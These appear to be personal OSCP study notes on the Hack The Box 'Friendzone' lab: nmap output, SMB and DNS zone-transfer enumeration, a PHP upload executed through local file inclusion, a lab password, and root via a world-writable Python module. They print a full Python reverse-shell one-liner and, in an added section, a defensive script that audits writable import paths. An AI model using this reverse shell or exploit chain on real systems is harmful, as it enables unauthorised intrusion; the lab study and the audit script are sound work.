OSCP Notes
HTB Friendzone #22
Nmap Result:
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_http-title: 404 Not Found
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2022-02-22T05:02:00+02:00
| smb2-time:
| date: 2022-02-22T03:02:00
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
21 enum:
53: zone?
SMB enum:
80 enum:
SMB Enum:
smbmap -H 10.129.1.225
Looks like we can read from general and Development.
smbmap -H 10.129.1.225 -R --depth 5
Running this will go in those directories and discover files.
smbclient //10.129.1.225/general
and download the file (get creds.txt)
creds.txt content
----

HTTPs

https://friendzone.red
/js/js
It's executing php code.
---
Let's try some zone transfer!
dig axfr @10.129.1.225 friendzone.red > zonetransfer
Now we've got more hosts:
now do the other host:
dig axfr @10.129.1.225 friendzoneportal.red >> zonetransfer
cat zonetransfer| grep friendzone | grep IN | awk '{print $1}'| sed 's/\.$//g'|sort -u
Command Explanation:
  • grep keeps only the lines containing the keywords "friendzone" and "IN"
  • awk '{print $1}' prints the first whitespace-separated field of each line (the hostname)
  • sed 's/\.$//g' removes the trailing period. The pattern you want to replace goes between the first pair of slashes and the replacement goes between the second pair; here the replacement is empty.
  • Syntax: sed 's/value1/value2/g'
Now we've got more hosts.
Used gedit to format the host names as https://hostname
Now use aquatone to see which hosts have actual content in a timely manner.
To use aquatone, you need to place the text file inside the same directory (/opt/aquatone).
Interesting urls:
https://administrator1.friendzone.red : login portal
https://admin.friendzoneportal.red : login portal
https://uploads.friendzone.red
We can also see the analysis by visiting the output html with firefox:
uploads.friendzone.red
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
We could try to upload a file in the development directory through SMB and execute it with LFI here?
test php
<?php
echo("Gorigorisensei Hacking your System.") ;
?>
Now it's uploaded to Development.
Visiting the following link, we confirm, that it's working.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test
Adjusted the script with the php reverse shell.
Now we have a shell.
User credential found:
Agpyu12!0.213$
switched user.
root owned file found
Can't edit it, though.
This is running just the os module as a cron job.
Let's do LinPeas.
Writable file found, and it's the os module file! If we edit this, it will be run by the reporter Python script!
Replaced the content with the reverse shell (removed os function)
This wasn't working, so I used triple quotes around the code, but this didn't work either.
I used this instead:
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
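A defensive check for the condition found above (a world-writable module file that a root-run Python job imports), as an added example that is not part of the original notes. The function names and the sample tree built in demo() are constructed for illustration.

```python
import os
import stat
import sys
import tempfile


def world_writable(path):
    """True if any local user may write to path (symlinks are followed)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:  # broken symlink or entry removed during the walk
        return False


def audit_import_paths(paths):
    """List directories and .py files under the given import paths that are
    world-writable, i.e. where an unprivileged user could plant or edit a
    module that a privileged Python job later imports."""
    findings = []
    for base in paths:
        if not os.path.isdir(base):
            continue
        for root, _dirs, files in os.walk(base):
            if world_writable(root):
                findings.append(("dir", root))
            for name in files:
                full = os.path.join(root, name)
                if name.endswith(".py") and world_writable(full):
                    findings.append(("file", full))
    return sorted(findings)


def demo():
    """Constructed sample tree: one correctly protected module and one
    world-writable os.py, mirroring the finding in these notes."""
    base = tempfile.mkdtemp()
    os.chmod(base, 0o755)
    safe, weak = os.path.join(base, "shutil.py"), os.path.join(base, "os.py")
    for path in (safe, weak):
        with open(path, "w") as fh:
            fh.write("# constructed sample module\n")
    os.chmod(safe, 0o644)
    os.chmod(weak, 0o666)  # the misconfiguration
    return base, weak, audit_import_paths([base])


if __name__ == "__main__":
    # Audit this interpreter's real import path ('' means the current dir).
    for kind, path in audit_import_paths([p or "." for p in sys.path]):
        print(kind, path)
```

Run it with the same interpreter the cron job uses; any finding should be owned by root and have its write bit for others removed.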
I'm definitely getting better at vi... but still not great at it:
vim commands I used today:
dd - erase a line
u - undo
i - insert